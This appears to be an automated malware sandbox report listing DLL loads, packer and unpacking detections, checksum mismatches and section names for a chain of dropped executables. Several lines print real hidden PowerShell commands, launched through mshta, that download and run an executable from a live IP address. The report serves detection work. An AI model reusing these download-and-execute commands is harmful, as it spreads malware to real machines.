                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: wldp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: profapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: ondemandconnroutehelper.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: winhttp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: mswsock.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: iphlpapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: winnsi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: urlmon.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: srvcli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: netutils.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: dnsapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: rasadhlp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: fwpuclnt.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: dpapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: cryptbase.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: ntmarta.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                                                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                                                Source: Google Drive.lnk.26.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                                Source: YouTube.lnk.26.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                                Source: Sheets.lnk.26.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                                Source: Gmail.lnk.26.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                                Source: Slides.lnk.26.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                                Source: Docs.lnk.26.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                                Source: aV2ffcSuKl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                                Source: aV2ffcSuKl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                                Source: aV2ffcSuKl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                                Source: aV2ffcSuKl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                                Source: aV2ffcSuKl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                                Source: aV2ffcSuKl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                                Source: aV2ffcSuKl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                                Source: Binary string: mozglue.pdbP source: ILqcVeT.exe, 00000017.00000002.2551363792.000000006B99D000.00000002.00000001.01000000.0000001D.sdmp
                                                Source: Binary string: nss3.pdb@ source: ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp
                                                Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1466076584.000001DDD56E5000.00000004.00000020.00020000.00000000.sdmp
                                                Source: Binary string: BitLockerToGo.pdb source: 7dbaa342f5.exe, 0000003E.00000002.2594796685.000000000DB74000.00000004.00001000.00020000.00000000.sdmp
                                                Source: Binary string: *e.pdb source: powershell.exe, 00000009.00000002.1468143447.000001DDD58B0000.00000004.00000020.00020000.00000000.sdmp
                                                Source: Binary string: tomation.pdb1 source: powershell.exe, 00000009.00000002.1466076584.000001DDD56E5000.00000004.00000020.00020000.00000000.sdmp
                                                Source: Binary string: nss3.pdb source: ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp
                                                Source: Binary string: mozglue.pdb source: ILqcVeT.exe, 00000017.00000002.2551363792.000000006B99D000.00000002.00000001.01000000.0000001D.sdmp
                                                Source: Binary string: BitLockerToGo.pdbGCTL source: 7dbaa342f5.exe, 0000003E.00000002.2594796685.000000000DB74000.00000004.00001000.00020000.00000000.sdmp
                                                Source: aV2ffcSuKl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                                Source: aV2ffcSuKl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                                Source: aV2ffcSuKl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                                Source: aV2ffcSuKl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                                Source: aV2ffcSuKl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                                Data Obfuscation

                                                barindex
                                                Detected unpacking (changes PE section rights)
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEUnpacked PE file: 11.2.TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.620000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 12.2.rapes.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 13.2.rapes.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEUnpacked PE file: 14.2.TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.620000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeUnpacked PE file: 23.2.ILqcVeT.exe.f80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;hbloxsmk:EW;bicjwbqp:EW; vs :ER;.rsrc :W;ZZu~:W; :EW;hbloxsmk:EW;bicjwbqp:EW;
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeUnpacked PE file: 24.2.vertualiziren.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW;
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEUnpacked PE file: 45.2.TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEUnpacked PE file: 49.2.TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeUnpacked PE file: 62.2.7dbaa342f5.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yououbtf:EW;qtaxnsnn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yououbtf:EW;qtaxnsnn:EW;.taggant:EW;
                                                .NET source code contains method to dynamically call methods (often used by packers)
                                                Source: random[1].exe0.16.dr, gBMthepoZSL1ZVKpeA.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                                Source: acd63ce6fe.exe.16.dr, gBMthepoZSL1ZVKpeA.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                                Suspicious powershell command line found
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: random[1].exe0.16.drStatic PE information: 0xB00FDD35 [Wed Aug 8 20:14:45 2063 UTC]
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C142DE
                                                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                                Source: nhDLtPT.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x73d64
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: real checksum: 0x1c50e2 should be: 0x1ca818
                                                Source: vertualiziren.exe.22.drStatic PE information: real checksum: 0x1ac12a should be: 0x1aef47
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: real checksum: 0x48f17d should be: 0x49965e
                                                Source: c105f06ef0.exe.16.drStatic PE information: real checksum: 0x317062 should be: 0x315548
                                                Source: random[1].exe1.16.drStatic PE information: real checksum: 0x317062 should be: 0x315548
                                                Source: random[3].exe.16.drStatic PE information: real checksum: 0x1c50e2 should be: 0x1ca818
                                                Source: random[2].exe1.16.drStatic PE information: real checksum: 0x1b00fa should be: 0x1b7162
                                                Source: random[2].exe.16.drStatic PE information: real checksum: 0x48f17d should be: 0x49965e
                                                Source: vertualiziren[1].exe.22.drStatic PE information: real checksum: 0x1ac12a should be: 0x1aef47
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: real checksum: 0x1e1343 should be: 0x1e4763
                                                Source: df2fea7261.exe.16.drStatic PE information: real checksum: 0x1b00fa should be: 0x1b7162
                                                Source: random[1].exe.16.drStatic PE information: real checksum: 0x3c3c45 should be: 0x3c87d7
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: real checksum: 0x3c3c45 should be: 0x3c87d7
                                                Source: acd63ce6fe.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x794ab
                                                Source: benskvi.exe.24.drStatic PE information: real checksum: 0x1ac12a should be: 0x1aef47
                                                Source: rapes.exe.11.drStatic PE information: real checksum: 0x1e1343 should be: 0x1e4763
                                                Source: f0b421a199.exe.16.drStatic PE information: real checksum: 0x1dd1f8 should be: 0x1da39d
                                                Source: random[1].exe0.16.drStatic PE information: real checksum: 0x0 should be: 0x794ab
                                                Source: random[2].exe0.16.drStatic PE information: real checksum: 0x1dd1f8 should be: 0x1da39d
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: real checksum: 0x1e1343 should be: 0x1e4763
                                                Source: Gxtuum.exe.20.drStatic PE information: real checksum: 0x0 should be: 0x73d64
                                                Source: nhDLtPT[1].exe.16.drStatic PE information: real checksum: 0x0 should be: 0x73d64
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: real checksum: 0x1e1343 should be: 0x1e4763
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: real checksum: 0x1e1343 should be: 0x1e4763
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name:
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: .idata
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name:
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: vbshiqxp
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: ijdsmmzx
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: .taggant
                                                Source: rapes.exe.11.drStatic PE information: section name:
                                                Source: rapes.exe.11.drStatic PE information: section name: .idata
                                                Source: rapes.exe.11.drStatic PE information: section name:
                                                Source: rapes.exe.11.drStatic PE information: section name: vbshiqxp
                                                Source: rapes.exe.11.drStatic PE information: section name: ijdsmmzx
                                                Source: rapes.exe.11.drStatic PE information: section name: .taggant
                                                Source: random[1].exe.16.drStatic PE information: section name:
                                                Source: random[1].exe.16.drStatic PE information: section name: .idata
                                                Source: random[1].exe.16.drStatic PE information: section name:
                                                Source: random[1].exe.16.drStatic PE information: section name: yououbtf
                                                Source: random[1].exe.16.drStatic PE information: section name: qtaxnsnn
                                                Source: random[1].exe.16.drStatic PE information: section name: .taggant
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name:
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: .idata
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name:
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: yououbtf
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: qtaxnsnn
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: .taggant
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: .rsrc
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: .idata
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: hbloxsmk
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: bicjwbqp
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: .rsrc
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: .idata
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: hbloxsmk
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: bicjwbqp
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: .rsrc
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: .idata
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: hbloxsmk
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: bicjwbqp
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: .rsrc
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: .idata
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: hbloxsmk
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: bicjwbqp
                                                Source: random[1].exe0.16.drStatic PE information: section name: .CSS
                                                Source: acd63ce6fe.exe.16.drStatic PE information: section name: .CSS
                                                Source: random[2].exe.16.drStatic PE information: section name:
                                                Source: random[2].exe.16.drStatic PE information: section name: .idata
                                                Source: random[2].exe.16.drStatic PE information: section name:
                                                Source: random[2].exe.16.drStatic PE information: section name: pqifeagr
                                                Source: random[2].exe.16.drStatic PE information: section name: oolacami
                                                Source: random[2].exe.16.drStatic PE information: section name: .taggant
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name:
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: .idata
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name:
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: pqifeagr
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: oolacami
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: .taggant
                                                Source: random[2].exe0.16.drStatic PE information: section name:
                                                Source: random[2].exe0.16.drStatic PE information: section name: .idata
                                                Source: random[2].exe0.16.drStatic PE information: section name:
                                                Source: random[2].exe0.16.drStatic PE information: section name: qqigmylm
                                                Source: random[2].exe0.16.drStatic PE information: section name: tdbiameb
                                                Source: random[2].exe0.16.drStatic PE information: section name: .taggant
                                                Source: f0b421a199.exe.16.drStatic PE information: section name:
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: .idata
                                                Source: f0b421a199.exe.16.drStatic PE information: section name:
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: qqigmylm
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: tdbiameb
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: .taggant
                                                Source: random[1].exe1.16.drStatic PE information: section name:
                                                Source: random[1].exe1.16.drStatic PE information: section name: .idata
                                                Source: random[1].exe1.16.drStatic PE information: section name: dwnnnbgo
                                                Source: random[1].exe1.16.drStatic PE information: section name: lhzjyktk
                                                Source: random[1].exe1.16.drStatic PE information: section name: .taggant
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name:
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: .idata
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: dwnnnbgo
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: lhzjyktk
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: .taggant
                                                Source: random[3].exe.16.drStatic PE information: section name:
                                                Source: random[3].exe.16.drStatic PE information: section name: .idata
                                                Source: random[3].exe.16.drStatic PE information: section name:
                                                Source: random[3].exe.16.drStatic PE information: section name: hjgvekwy
                                                Source: random[3].exe.16.drStatic PE information: section name: pramlbdq
                                                Source: random[3].exe.16.drStatic PE information: section name: .taggant
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name:
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: .idata
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name:
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: hjgvekwy
